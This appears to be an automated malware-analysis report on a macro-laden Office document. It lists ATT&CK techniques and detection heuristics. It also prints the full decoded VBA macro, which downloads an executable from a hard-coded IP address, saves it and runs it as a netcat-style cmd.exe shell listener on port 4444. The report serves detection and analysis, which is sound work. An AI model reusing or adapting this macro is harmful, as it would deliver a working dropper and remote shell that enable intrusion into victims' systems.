MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1059.003 Windows Command Shell
The VBA script uses WScript.Shell and CreateObject to download a file from 'hTtP://92.63.197.172/crypted.exe' and save it as 'nc.COM'. It then executes 'nc.COM -L -p 4444 -e cmd.exe', indicating an attempt to establish a reverse shell. The document body explicitly prompts the user to enable macro content, a common lure.
Heuristics 10
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL hTtP://92.63.197.172/crypted.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2854 bytes |
SHA-256: 3ee9eafc008255268e45a49533bb0662cf1d7f8f2e6a6e6b6f26fd50e10484d8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "moscow"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "moscowwww"
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
Sub ACADFASDFASD()
Dim GVuIHNlc2FtZQ
Dim hpamtsbm1vcHF
Dim MTIzNDU2Nzg
Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
Set hpamtsbm1vcHF = CreateObject("ADODB.StrEam")
Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
NTU1NTU = "hTtP://92.63.197.172/crypted.exe" 'Where to download the file from
NDQ0NA = "nc.COM" 'Name to save the file (on the local system)
MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
GVuIHNlc2FtZQ.Open "GET", NTU1NTU, False
Sleep 1
GVuIHNlc2FtZQ.send
Sleep 1
hpamtsbm1vcHF.Type = 1
Sleep 2
hpamtsbm1vcHF.Open
Sleep 1
hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
hpamtsbm1vcHF.savetofile NDQ0NA, 2
Sleep 1
MTIzNDU2Nzg.Run MzMz
End Sub
Attribute VB_Name = "swxidw"
' Test program for the Base64Coder module.
Option Explicit
Public Sub Main()
Test1
Test2
End Sub
Private Sub Test1()
Debug.Print "Test1 started."
Check "Aladdin:open sesame", "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" ' example from RFC 2617
Check "", ""
Check "1", "MQ=="
Check "22", "MjI="
Check "333", "MzMz"
Check "4444", "NDQ0NA=="
Check "55555", "NTU1NTU="
Check "abc:def", "YWJjOmRlZg=="
Check "????", "Pz8/Pw=="
Check "abcdefghijklnmopqrstuvwxyz0123456789???", "YWJjZGVmZ2hpamtsbm1vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Pz8/"
Debug.Print "Test1 completed."
End Sub
Private Sub Test2()
Debug.Print "Test2 started."
Dim i As Long
For i = 1 To 10000
Dim s1 As String: s1 = GenerateRandomString(80)
Dim s2 As String: s2 = Base64EncodeString(s1)
Dim s3 As String: s3 = Base64DecodeString(s2)
If s3 <> s1 Then Debug.Print "Encode/decode failed for """ & s1 & """ / """ & s2 & """ / """ & s3 & """."
Next
Debug.Print "Test2 completed."
End Sub
Private Sub Check(ByVal plainText As String, ByVal base64Text As String)
Dim s1 As String: s1 = Base64EncodeString(plainText)
Dim s2 As String: s2 = Base64DecodeString(base64Text)
If s1 <> base64Text Or s2 <> plainText Then _
Debug.Print "Check failed for """ & plainText & """ / """ & base64Text & """."
End Sub
Private Function GenerateRandomString(ByVal MaxLen As Integer) As String
Dim l As Integer: l = Int(Rnd() * (MaxLen + 1))
Dim s As String: s = Space$(l)
Dim p As Integer
For p = 1 To l: Mid$(s, p, 1) = ChrW$(Int(Rnd * 256)): Next
GenerateRandomString = s
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.